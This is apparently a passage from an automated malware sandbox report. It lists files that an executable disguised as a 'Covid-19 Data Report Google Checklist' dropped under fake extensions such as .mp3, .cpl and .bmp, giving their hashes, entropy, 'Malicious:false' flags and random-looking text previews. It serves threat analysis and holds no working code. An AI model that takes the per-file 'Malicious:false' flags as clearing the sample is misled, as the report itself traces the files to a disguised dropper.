                                          SHA-512:4AD0A39D28F603B47F38223ADDD44DEBE50696B5AC1C3CF2495689F9CD552F40B186B43C986F840BC91331EE91E52A7B9A6BC28F0035FF31B83F3AD671D91E99
                                          Malicious:false
                                          Preview: 19j9t391Y2WO04XX5JCv1h6R4w0f0WN6it088tHD558C4yaqi7is4Bf2ML093r21Tv0vZM7w635yU6GowoBj9l6K07RJhQKo6KZ6wl15r5270f7Q37V6zfU8j2266T9Mh00D5xM7dQ2H081220iJrM88d..wh02qhO34ZD3F2cLd0t592Hs7ZE9I2..e05C71J795TF0jT16PSD70lRqv10ZLGx0d8yG7nC9kD8C312wUOeTxnLV9451X3N30T9780C2j6D27v56m0r8876g..71SA6Bp1Yr8oOLHlDN7Wc34rb62Y7OsC01uU6BYRUR1O0S47pNRr2mKTA53Ci3pt8O04q8x7B6j2B3H1J89m818EPqN56n1oT9SezL3..k81Fh9F5Lf8w9YMHiLcUz7K330W9w4gs6W..0MTy1Rzvsxa8Y3G141ND22H0x4k9S21247Z472DF45324e522P059OZ43n1Q70g8UIVex6do7LJ860sjl7xXf35r5dPq2s35X7Y46Ot441w1QXp493A54OXU8r4a3t..
                                          C:\84086963\hdwv.mp3
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):553
                                          Entropy (8bit):5.527928689562825
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F95E0A74D1F5E310381CF73256A75E8A
                                          SHA1:D1BCC351C5D704B4C2F320F3BF1189CE4B4CCA43
                                          SHA-256:696E60A0E1BA16CA2DBC51046BCFC10BBB7FEB08E22775DC3291250870D4D9D2
                                          SHA-512:25F62AD573A4BAAD9B9994B78B8C02F5D5D0D938A938CF10BC47288F7DDB985936B751E63E04009F2BEC18E9588B40712221FA81EA6330336AE6ED254CE32E74
                                          Malicious:false
                                          Preview: V752468waY5v05y7dsQ7d2E8Xhu917..3VO06b9LEX8Ib61S2J7..7H94s4H6z3D449Qhfn3O15Af4F8Nh9Y66nGQHNEPS7oQ0bWjx6TI1wC7525at50b94632N2vxP80ySM15a8nO06..1G15609610l598xOs0x..1830Sjof6747Hr20GZq31d3h60oVTy2v0hEy5G8J57saavxe56O9334XV8349rTo08FD237n96M206lTf1IT7Y7d0e40mHZozO2d93nENTkQlu31K4Mo5l2H6qPo1..2G95414H1607w2..8Z3K51484M..6k2G632hi8k9h4VmG4051T2HJg6Agk9KZda20Kf7Pqw5..75B3KYM7XmLV1Q3Q368VRS7i3I3Rg47L8ELI0UQfg767nrZ0c71wh0k467mlX183A51SJ57j3AQIVx20b8O3lZ78MQ1Y47J..J219cfVBnV751560K09yptZN0D5Oa0f4eiQ..43x16swxDG69276F6AM73yq56z81AhaT92PnzOVd1Mi6z2M0ip55k..
                                          C:\84086963\hfohbsolju.cpl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):504
                                          Entropy (8bit):5.488399112677618
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5250E9A9314FB47F79881BCCFF36E2C2
                                          SHA1:B966AAB8141F9F1CCB5FDE5FD15D42C588ED5295
                                          SHA-256:FD8F54D5C1E8739F38D0F08C1DCD82DE8E1E2A1B5B672492BA35F625D22B753C
                                          SHA-512:290962436328BFB781EAF51188BE5ECF7BB6349D8CE79BA0D7EB84E6BA2C8D5C3047415E69F38F1961E78FE76A9AF2ADE8B75BAAC1A142304274DF179E1CB280
                                          Malicious:false
                                          Preview: 2r4288IXS3V16l78x4w36HL5c02itUtqfWLZYS0x4P16239p88u71n07s69..cgvt3b4A34539..56dG1DCi06Y1u3HRY4Z4789429P5E7615VN2A058aCJg11xrYpXR3PSL7Y7164T3U6994Qp290P7u4T4309i257m4G65m0..6rL2G3qg682P20i6536zqd376OACyF32384KslHKM6bADGf7OfTH002pXZ83R9n3i636R1ogC1h2fco25l721jPl9q0ap73E0wtO4s7u2v..4cpQI3840753t8Ke8Pa0nh77u663VlF4O5955S1qu5y..C8m9V36jCb2IY7WG10848m8s8w29tQ14F41e..I5i6tO5W275T6lZb7q1fZbUf8Gr8s79831KK3K0R4m7c4j3s6fG233b1kR772B88i68wnz876p480Jv1XlyxT9h9XX6W6873of03O3zz25nY801Owq67ad1N371T3djbTB2ywe3Vhc4..
                                          C:\84086963\hnhm.ppt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):531
                                          Entropy (8bit):5.43831352703004
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3EE4FFD172372E6EBF0B9CC05FA574B3
                                          SHA1:EE447A5DBBED57E86059C33AD9330F63548A5120
                                          SHA-256:7DCF83DF74DB0173EE3CBA63F61A560DCE2D40A3F7BE552B902199F0BE10586A
                                          SHA-512:E38FA5BA8880B42A22D8C88A14588980AD5617117EDF3A9054F9B789295BC9B5572A8ADDDA2B0F0F61AA024BFA1232F6529D7CCDDC6B4A3306BAFFEFFB5702E8
                                          Malicious:false
                                          Preview: 7V9Lz93t4ed21FjuEY68sqj3N8K5ZI7T665545D60LO6OW0DAC5Mvb990wbt698qB4dzD916m37y1Ipmt6ll79hAt708i6sT4N8U643p8v0v2Se6703Ix6nN3G8..q1ueHdr9nXuc3O0H2G7TQ189c86HQz35532u0V2PvZ05n24D9A8P96BDy9T8875yi2KG6Jun..50MJ0759e..o061qE1eOFG12h5O6G..954w980841zuK8H12dS31856R87t4j6g11X..r812520Q7h17y51817SA9V811156690B078559y7EeYXS190060335BD9705rO..5dDgh02p188Y69067x3p12..11S2..007TU78ajI11L7808068ZfEvvime829OUJ2IZ529LkQ8DD9NC151Bn0W71Z9T263l6o1D2PGx72N76LJLrKeW50c9xfG9Z4i0ULS53Mc48QPH07d64a77527o3ZIC03t8PtzJeU2iRdN78Ih5T8ey5584qrQpu220rm11Rds..
                                          C:\84086963\iiukcjdl.ico
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):571
                                          Entropy (8bit):5.419640087050579
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:28A9CA32C49E8D55B242247601B7FACE
                                          SHA1:7F2F61FFA07D965D31C458B3CCF2A84CF89D4854
                                          SHA-256:20089DFC3B975AD1A4935F60EAFC6B23D107D958230F40E8C2B21F06A111879D
                                          SHA-512:91B156324DD82DC8F98804AC5D83F17E365CD651297BD1B827822A31B71013178C51227F0BDEBF7286488913E91C0474505E754A28777DE84EB14F6C5A1B92F6
                                          Malicious:false
                                          Preview: 40Byja117427L70c796w0op..c32dfIK80Yz5YH224o6J0mQSHV1Ds5ien3178bn1bde71f25Y326391R708tBGUa9..9HD337S522ms42b1z0762G0U9vYU64re814FAzse99Jw924y2v664uCU7024U028Hd930I8V8IbNX1ZD2h72TB2..xNo8Hmg1835eI925740i2PHf3Y606T95X44764XbJR6ZM7U812FM88OVv5Rm68KWkQC02DG9U717635t..3753155u..C7eq29349Gk8L163324210s5S8GAD2Xp5naF7RBT8z4OhRK5E47v60i3R42..L40y62LcQ4A327r9281847KfOU400090WgB8z..VJ3yO9FX42713D925L..36T2v00J769yZS8rUsQpO1H01O4352cp305UAb49V5s4Zo2Kf05CMdxNU..XH22KBAl95470892xJ81l5q1kFTjrU17G2Wy07155HH4M3515K539Wod5S3cpRp07w6T262t6w6B279bc4M57174237fHr7nqo4O48949480ahlCT869F..
                                          C:\84086963\ilpgatrp.mp3
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):510
                                          Entropy (8bit):5.525847487225451
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B6806E3AB728CFE56D41F1255EAA180A
                                          SHA1:F2DA1229EBC4E007F7265ACEF559ABF3937FAC12
                                          SHA-256:4737DA62BEDC07DC857A87AB00A5982618810607391C448237A6B01168E5AD40
                                          SHA-512:83556B7FC555BB96E1AD4458992EEDC695F61CF2158AB605FF7A9DB051D0925CC69426E039CF3D74E6A086F3652F6DF96E87F37D3AD82A7C138968139822C312
                                          Malicious:false
                                          Preview: hAZ2wdVH101S9h8v9ic2KK73EWFKUU1e04O0872477E4a56fB607R7y7h824c30g87X0355B8520297h059c2..686j01E7la4Gi5mU2783q50G71rb164i4571k1HVf41986Q2WMAn445mFWaaqZ3y6O1xptSx1cXjf9H88S967t4ut3jZ38m44tR629J9902U72rXWkb758H8tUN13P308V..81Zo999v2..LW8wdIK3run61620..bsR1D1J73YHSS25rH07OfZP8C9s..2z30Prc6pP7EcvoC8W8R06H4h6df84m88HFD70VQt08SGv87W53F..9ZhTo3389vQ2sY77f8PwQI7FaD3G69gQqDG66Kb5zjA9ixvM9QhXQN7WPB1I0IC8CtprUmM4DveZ9w17sb68..1Gk494K2MH9734f69OZ5x3R52u7513dXm2039..vyx0Ud72nWGHbX8E4u7nwwZcg2313K806QT20G401u95b22T06GD..
                                          C:\84086963\ipontssug.ini
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):528
                                          Entropy (8bit):5.526772857335459
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:241CDBD9D0E438C83A2CAB69A991CEC9
                                          SHA1:389ED4A1E58E5F4CF992AAB0B6E78A086BBF7AED
                                          SHA-256:F552A05AD6B5B29C34114A4658FEB7D84B18C446052E668B46E7F9A239342F2C
                                          SHA-512:15E38573B7FD81793E9F4EF88E812A434E895D9986E1E18469CEFD9DA32C212907F051BFD8C4E12367E6CA86F330E4ED463951E0A1ECA9C9088C830C76D77125
                                          Malicious:false
                                          Preview: c68VCQVRN9U8hI279AGP7HA744u6H5ww0U6i3e23v2mP35sb2U9A95YJFv1a423mW..bqQ84P5KqUw7OpXLx9u7c083562g9HC9896368077Z517FT1iXnUnfol3c1gU6e867hT14V7..44t12H7Xb7k..2U6M581X..wt616hIGM8z7293gKJYMxIF2jqlj35Fm403AYxDPS46yN4VA148V874SI272189ojgC3754827pZzlyG01wT0p1YDgB9H6f8xmDTWh1555vIoD549Yi263LrE45iQ732J98VChwd03w97852g6..7P2Ysu6I18POTAET1ngNS96188u3J1057ERSksCK88Hc5t2E70468dNRSfk2YV752Y2Bi3F5B884RRn7J5684mT0E0VNRgv59JEb52hUl907j6M06y8Q3S1..52P6780J2p4JnB7u600DM189i7p7fZh3O880rTS278g5a86WZ4I380U89412Q6918L975NiIZu5GJ00h4z1CGA6V5VTL0..
                                          C:\84086963\iqfcgawc.mp3
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):549
                                          Entropy (8bit):5.576922223356181
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1B1C5C629A134083995DE4E672A748FC
                                          SHA1:DAF58F88444316D6B68552D2FE5B7FA3C2B2653C
                                          SHA-256:07F0AE3F0A93F15441A315B4C58E5609DB9963180A2D7722290683AF53C9967D
                                          SHA-512:97ACB9A5CD8990A4D3D733F20F93AD53D7DA1B44AD5803411B9E72D6C64ADFAE5C9C4751A680DDFE13BEBA7189D8CF40EECEC2CCB7983BC161BCA3835F2D2389
                                          Malicious:false
                                          Preview: F76zGXtj9D2rnKrFw2B3r264M90mUff1792EH3..14gr151xlPhUX8pWDKZl6R7BH8tnd3L531Y6972lQ8k3L9VT77kpaI8..8Ua1Wj84vDZ4dH76nc851kswSH7RY094F35K64z0pKe32idd..96E0a74zAyf405xG740182i505U2122RXr03IHbp34V494693644e3utS2ynC3Q5kL944H7VE..TN22vw3h1o74G5y1a4w62wN4ht68YW0X40dT4t4115BV49MYiSX4uE673658sW5g98HofE2xbSgH1h1ui5Y022..58hVK90OMTo38jC45O9HSy8h5GBXyCA8vyqm9mN4ksi66nCN6p1L1V028yu10NyHgg05l1IidY..yZ430G70imd88Y0Yxl1xABac59e8XM710sL05b4T..9t8R428i0Ko263Ap31239d56g2cJ11C18VL7g62O010s6q3487fE3uwIIX5yWRq9557bU9Se860H82m5DG7t42Z6v2CS51M57UdO05O96Cs8jK5HCF2a75A..
                                          C:\84086963\jicbdmo.xml
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):518
                                          Entropy (8bit):5.530307634342483
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2E93E6AC6A7FBD1199A5BAE64F1CBB41
                                          SHA1:AA1A4D3C9360360DA75DC57D11D6D9AD9E16223D
                                          SHA-256:2931869EE1FE06482D3010B08F6AF7C146E6A5D50DBB82C68DFA3937E8DA1A80
                                          SHA-512:CFC3B3EAAE299FB9AE042CC446DDCB45A6BAF7C56D82CD00F8F843AEDEA825600B34A26D0281E3967B14CF9CB089A8CBB6860613943B0768DEE1D375FD271BF5
                                          Malicious:false
                                          Preview: Mmjx2H8839955eFvu038a7s58LA6A3z24v971jRfTMRfwmW0Ui57r18YUJnX7Ri5fIf67..CYr3588g42xG52324K9XK729K9wKb5shJk76773IvqP26h0SrUI61ePb4990Z4u8b692PE7bMgg001ZUk7Y158272Q001DwZ040..N38AvV5508HP8A687658OLW720vyF0G1hb65z65x2X064r49d24r478q57cx5c44jluN7e2j9TMp69itr33c90152U3iH8SL56147Q643lGFuJAb8T4v58J044bT69362QaXtbF993V1E43s..207gkPPJ967b0505MO3Lu0J6Tsm93MXO5T14AyDW31CdoaL24xZ1pSpQ4K55RvXnRTT24dTK4DL9q6oc58s4323678gqsXL9cJROGFZT786IjV8hjw46X5e18rn8DHS8E1m4Dn303y..69MAm3HS6gw741dm8BG720n1b8d283PA853720bIsZWy83SWt7Z8PH15Yp..
                                          C:\84086963\kbwqo.icm
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):522
                                          Entropy (8bit):5.4373930643360024
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:76E5AB326536B0E07A406ABF89BCA651
                                          SHA1:EFD5A3710F7929BB83039E7FCD3246873C0E9F15
                                          SHA-256:1BB05DA11DDBE5D12E27425BF9EB86553F2389CE0B8651FFA8F6738EF428AC12
                                          SHA-512:7CB2AA76D3D280C8D529C4F229BA8E11CF7CB9F08787515BD9EFB2029A7BE6925EAFA2AAA17227500481D2ECF65F027743BECD962484DC7ECF931AE6F4369FE3
                                          Malicious:false
                                          Preview: j911S853636kgi18548..0cVdc3X..T3Ay3xcd48e5J5g9YnW10cr6085c35..G1j5629vea6946109Kc592N69f38J6677koN1S1wK5uZ429sW83K7t50S8513222zNoU..N4uWXKj6C25Ubb6B3JSR0N1fJY8y686rQ1I6Z2F9uQ4..5r25gY60213y6UDE..3w541Q114r240H6P5VH32Tm3Nh52Mi73265S5473Ws4430qck989em2PX2Mr8o89c8s73Oe7u1vr2W99f9I89SVTwboTbK00H03xV8gkKD42679N260I77D3RL..3x88vHA71m3N4z68L1883Y38f2V12Vb1NL1491v2EXyF7Qo4b07N0oMjWVw3ombhlZIB9zKI92WJ92uaL8KgM0244w3698c..16wEl2x37h9JCy2917x2va125W30f15766e44rVuJaN84ux4a85379NQ65Yp830qUk9VM8ex4WBM1j43fF0WTw345Hw5q7KstVR21g1R..
                                          C:\84086963\keiv.bmp
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):327849
                                          Entropy (8bit):4.588913972555565
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C0A840407476DEF688DC7ADFCF31F4B4
                                          SHA1:B803063D8AE0CDDC18739E7D554B1A81AD9CD3B0
                                          SHA-256:678AFDFD84359BEB5FB2267A1B62D2B9CED9C0788DA91FDCC0D84F09CAC9CC17
                                          SHA-512:DCA4EC69779B83A6A1D9FA64219642B780A2607306C074BBE30C1E211A1C589FB42AEB9E00251130F0E42A420421C02465B01155911D696BDC4478DE7ACE0791
                                          Malicious:false
                                          Preview: 291771jF1mM28850Pn19N8598E599790tMu20W0iDvc5O..nqc1137c708s7d3I9J5jk82c81juT030bz4sP886GKpkwo7Z711Kesc3c..F368y7d110392rtL6LGDrQwBf152841x7297Ru6142BE9839n4omUI1..oi847x8341tPW68TBY9KG6j254Z7guQo85ux7e0382NU9M2UK7l5JqhxSN3t9036je7B4a642ocPda15..6u5j4P376kV6dbT5QtaMKC10sG7U8513..7SGMgA6F01V55o9LK585k8z9Sr6sI8mh6R092y270LL4Bz3..5b1t7RnN15fWtV1I9ZHs43zzR66d40WR8h64w6H564X2OGJ5..8D0sP4721A929837x0011d35..Xm1e90Be82WyXgP3c41..9N8VCI27fsdm1yL7nWXa2M7AlNCC79WQc72L52X87J5T5mxO126Dyw4l3nD9w6430do..kB590dNq98S8yT76vqXVbv0O8C3o65p4I5M50j10v7T90055K83WR1F2d6Umwf6..9194r2l1x5y57K85NqpO2S1OEtdtXx582nA60sM..v8Na54i2B225ud02c6k41cysF21ph91545WRl9HT12y3m4125A0xJk5493mpN2966S93zGz5M22..2k33r9Px0f6K7YI543KpU2V91s1616n77c9V3752m1Jj3I1745794Ip5N9f2..33zay5g1I09604P64a9v2N667W3K769lFMAa959CmC21697FIM..0lz30q14137flE6i724oGx..9X0Wl96480s65m0R3I1W648QKy9131LzK7T8363905nPiU01405a3UM465Zdp4G146Qw17..N13I085Uk7Fd1z9iw6pNM84652x4072ull4se6UE37y4Ng5sHR4xnODS89161ir35uNQ9hBTrEzKnQ1l30..7r750W7YJSg9591V8228ztaZ6GgO9
                                          C:\84086963\kveisjkad.xl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):611
                                          Entropy (8bit):5.502498007400371
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6D06ACD34425A0D457A583A00C56442F
                                          SHA1:5974CB401440F0DF775770E2D26EA95798F958DE
                                          SHA-256:734EE4299A7971D10087AC9B1FFDD811F3E7F53F5D7EDA129780FB11DA8AEF98
                                          SHA-512:717FB305C4DE6C221014C34E569DB5D348B8B21793619E034EB9909B462B5F967EBFF1E00707B216712B79FBBC8FA77ADC6E587ED0DBFA14692F7F71A2FD81AF
                                          Malicious:false
                                          Preview: tiR27h1S9290W88zCUB5o102V1Pc5A186Otgu55gV1186s4KBAsc9N34850895WJZ8VK99vt88W645gz..r1hI7z6V7479HK0G79DeI1lx61f6cYnG3954087SKr0I8FMa43D273LMm15ZYx3r2f1313j7978n4N4C4NsfA38oJnnBD3651757E6539vV00Mt569wBByUT5hFIv0t54..pb87RT6a3487J3943p4fi081g00BR4479q06kqO21u72huY87x..X7qmMG13C9VmAg88A880SOQ86918OT8iv5n3Pk3km406H7y3bDr2Q167488i5f5I9rF9165r89D3AS2H0Ic6veDG13Emv4986iWOccksGkP21at943A9O8S75093..FU51azMXe3w59dM096b8uz10l0YGRJ9q4H5006W50X579G17554053..3fqr1u9yW4Cn92YDPDN648741fL7J2t6radC3138x307JL3S35RQAP7130H2Tj239y3Q0s2BlE0befM17z69lA58e369Iv484d9p6XrA1gYh5g16nJ45AByLrdjY5alxN1P31S1OPJ0445tw787z06mbT2xGpBo2D0..
                                          C:\84086963\kwjwpm.pdf
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):528
                                          Entropy (8bit):5.6074431131094284
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7C7BA25B6A000090A3C645B7D3027693
                                          SHA1:53314D9BF5C85E283C42BAFBD7F626BF7BD2AE0F
                                          SHA-256:57DAE0337E28545245FD1762AA820C1D512E2078069C448F9508915AACD077B4
                                          SHA-512:4049B50061DF2EFD8D3BE8A1C62D16372B9FE6A7430D8E8C28FC65AACDD8964732E6F93B810949169FFF046DAB07BABE62FDF439764E35C039098E7682E03F6F
                                          Malicious:false
                                          Preview: 761Xp11o12Q8IfuE6mi0V8k88Nj11j2xxV7O09M79f..PSdjog1a8cx8736dqX1m..13n8au67176kC2RM214yY8044z08s4dQ6sq577qm84A96nGU7FK183BF07SdkGAX6Hs9x45eI52P729Qr2bL18c4I1dS3GV6G4cIS4BC75NB98DU7g233A03e96Y2l0E5w45F6488f33OjCj..k9M5FX873bJ7li00Z2p2g3BIp7116163Ae7A6F5Z6wL568N74N5iYa069r9N6KW2aBA506Kkc8sO9VATUjh69vK94duZ0r6CuId0IdiiMZHU5VVO4400kjS06f7a4k32Z75r63I55zK4167V3z7RWQ7O3v1ul7a78wiaTc..ik4Wl56k9i59cuC1Ws8s6nG7Sf9p280J79545M4ycz7QK7j1C94RlhT..WJIPwF4AHmVD8l8JIL2y2p8AFm3777y1Po6w4b10aZvNloab93kocaS9i9es10S9K4sn05EHRh55nyteFW1UXulY5..
                                          C:\84086963\kwkcsr.ppt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):558
                                          Entropy (8bit):5.3530223467242095
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:62B3B4E207CA4471F867730E95455766
                                          SHA1:318EA50BE56A5E0B2D204D5683EF632ECB3776C3
                                          SHA-256:C5DB519D407493AAAEDA9F1FDD777D656717A6C6ED8E4ACA30DB7D7233BBEF16
                                          SHA-512:32D321251829D96D410424697E4B3188533F70AE0A28192384A7EA32F213A95B22BFF1B5B42CFBA2D79E0789F4B44DEDFC3EBAABC67CF7E5EB899069A602B1AA
                                          Malicious:false
                                          Preview: 156RHb1jd48I276s4lKh82c6u2sT293H38AcvP5674i5h6223WSM8Zj8A1gboe9aiF16L5KK6X0779..P8cR8797724V9v400S699i971T7000c53t9Q6T8M68R80V255FA42UWe229Q285d863..9w152Nk0uVY03t96gCw676889cy9fRb17xIe0v8H8q2LmFs0FR..82ntwha127nqr9UPZ3d1aA8PSI40P39gw2329152luRtqMAwBDT7082t13860cv906c873X82Te6V8Syf1f096s15Lk..S7h800924Vq43e50U6E0v01Z0vA6618b4Tl4H778d036c5Ri78086m9ZZV7l1W1gr92j2442ZMk9K0843291V8164w03FO32mkK7L6532M86106jc28aCz0..o9h8W1JO852LJM93MbL6WhL71uPXqE45t6N45646iVY4Z49X9446r24qXsUTR6L237D8306867ru6ew42GaNe8SN5A51F969zGeH92693RnW5q3406A9y8a563hcd4jnf8MrP51ifI640..
                                          C:\84086963\lbmqoquhgo.bmp
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):501
                                          Entropy (8bit):5.531395657002091
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:30FF1EF2CDF98239A8F51F88470EF205
                                          SHA1:3CC584E5F708A4376284E2900B73D010170F7667
                                          SHA-256:DB5DB507C5A87A4DF866EDB2FE49862E34C0CB0927C07DB2AECB503C8D3BDEB5
                                          SHA-512:FB16DB4AA06D516F0EFF693EC046B89A05619A8D141B3E629264726EA5FBC829EC81E21234515AD83E715ED35A7D9E00B9A684F6D6240423739158E09F08B0CF
                                          Malicious:false
                                          Preview: W9d1NPeOvwS3707B2y7c7iAE4jJ77o28668MHYRrK7f64n8Vxk123dY4359i2yT201741r74t88k128L6y0372l11OeZ7l0zCs70E5QmH858GHrn7l3266tO31R56HWpP9J5Ne56O4bd4669xhL6y..qN60694qK9iRmFD98Cq14c63JZbT7h73uMZqO14ts56h47XwGj1060gUI6575Ihp770155QP7BL8oZ81wK4Tc85W819h4EFaXw43Z94G6X93f91NU2sJG38UyUFSW5jj1Uc0M..08NIdJ694270914d3GlKg5DSlkO68OU0PW3vI8Fy0033m99L9I05gtWjO59U0bNy4747u34GPBNn61Ok3iQZq4Y..0S6581koG2z35hLtUs0ul6W23g4oWa7537O1mNnrp7r3612fncs7A9WPN8v8aLa2nSxEP909D839D1xQl5N6s95s0016FaR9tt5F291e40A5383x59w9239Lup41..
                                          C:\84086963\ldcauue.log
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):518
                                          Entropy (8bit):5.582739191372483
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:38A3EF198AE45CA8BB98250D007988DC
                                          SHA1:5B3DC5BF005BB67D5FFB203D1A3E5C02DD37356F
                                          SHA-256:A419F40E93D04AA5F842078EBABD177A20CF8779B3398808BDF46C189C775155
                                          SHA-512:A48F06D7E2098571DD9C1D291B632300E3ACC4A5D6FEBD281C32FC43D6EAF4FD302018E3CAC59F05BA5A8A995F285CFAC2DBA44683BC630C0C68843378FCB6F0
                                          Malicious:false
                                          Preview: 80Ke54dEG068f3H656gu69F312w03F7Ft2Y696m241528u31HG7z1tT209KZ4X9W0BQ3G5Mh3WPlg8cV5ET28uQsc429610Kp1Q..g11Rs1LnO280oko86Zb0SzKB4228i5UXf89yr5..O9L7037X1xWS138SC89sZ6uvqrvkyF1T30x5i9C37z0Nvx7R..K8U4i80nh31p0v6q8bX69891H8W5S206YB3355L06Q1WOE29Z733l4d06KN4N5G72aE700N36qC23k6Zv8..V2AOh819F7Qk7cj248vS3g8dRE96A0QM1TV1417sK11C1d6F95oHIn03Lz90ne1ijy4Pn4XF9e4ShgPaNCow4gmZLc3t..11FUjAz8140S6LvkY47FZFI82Q..vNY8am5bk8S827..LK5nMZx7ZcA77Lbh1AAsx11i0CsN3I6B1b4L4VPtFstvi06Qeex75TISR7t519bod1Xw0v1U4O0P2C4N744lz302D0mEwYncDEx53IF..
                                          C:\84086963\leqbikmpjv.msc
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):539
                                          Entropy (8bit):5.446202058195729
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:54240DB398CB62FD2444B9B1DAA16733
                                          SHA1:3D66693129AE59AE3EB9355B665B5C67F1B575C5
                                          SHA-256:8133BF66689277BC254C140B4D06462ED5A5AA3F92D6ECD86973698E095726F3
                                          SHA-512:6D58EBACD43945E97C08338F49E65698BD236E785AB7BA39E9AE708730711CA84E8D6522AE8F43DE3670561BB25992AA7B62D64839DEC155B9F609382398AA88
                                          Malicious:false
                                          Preview: 5WY4Mv2X7U3x4z8M7h10B09x23pcK297dR99558196936x0yx84H488tw13..3h8wO69p44qTqO6gpL36189xkjp6nz08smrN10N3q30n0Co98a6HaPm4N7Q6121Zzu5kL97uEcFJfV710Jj5g6368A5vE2szmr25hx87cq29gBxC99dB2v05ye9WXDe6P452122882WCrVbcog55a705U3E1T87KSoZHfH1ti70v80TB16M28..zQ72KP812619Al11kvM9b2aqK7L31Q956u90H2plPgOcQ35M1w2yB55446Pca29c326CX4O6j6k7410V17fSex1i2EU6m0NP381vP6M9052Asd54886WJyW4..82AD09oq9Sg06r294627F917FjLBW99ED8j5k5440KpNLvJgT8Y3i8YqTIJ25Jd16143808A12hvo44v01AwH1WksKm487V598x589E267hhBQa8DUC885f00461j7K12d35W1Kt30Uh65p77286249LwRxNa9745S7509JiHai..
                                          C:\84086963\lngpuluvo.jpg
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):550
                                          Entropy (8bit):5.379913664668419
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DF094B07D5496BCC157C03EB4282256B
                                          SHA1:DA764D0117FFAD70B120615A222294BFFAFFA8EC
                                          SHA-256:4463D70105F48D9D90BB96B007DAF924EBD33CA7C23FC6F398C97A4956EB1E44
                                          SHA-512:48A2F7AF97A560D52C1BFAEB042C6CF0DEFEF1DED46566D360A36B59722F95EE2255185784229497109A34ECC7C1BB6623648D31133BA0E9D8A43BF0D0C0BF8B
                                          Malicious:false
                                          Preview: 9287601W6I5X9O380E7194N4VSJV53L42nr292cj8mjgjl2ec3Fz895886BCd..6IeW7bfB..EsfL84Wq273AMv9w24ZVLJ0GO4sRk209b002W08M0j9396V4287No3323T2293QQ5J24St9932c7cs1xm29EW64Z93381027ZEQ4z7ZPeTt1o997g96Z97..R5O751T2u3sCn7162j3EqT52594Uj7763787Q416Evh88HCw78t37u1E60906hT..0PE8312PYsW9w08W957BFS8cpaQkXA6JF6cm5mCF1adg20mE1n8dlm411EevJ6sn9432o4N33..2H8O8Qqc5QP518ff55XeC67p06Xmj58Cp1NS4Edw7Wk50ksES3G7eb02899Y4821r561I1285s6327t1G0373IMl75j3U575..23h49EonP3C50O9d6430z8J97KH8e0I2J33T6kMx08PD5HWe4m076AeZ4PQgI9385wB1766HXX57296GHmMr492r3467R6Tkqh2kT35m7345S2QbV3u15..
                                          C:\84086963\lrpb.cpl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):549
                                          Entropy (8bit):5.513639799361316
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F3D529E84DE78AE012CAFB6EF7E5231F
                                          SHA1:57ED29D31B32A8A2915C4334C801E3FF70418617
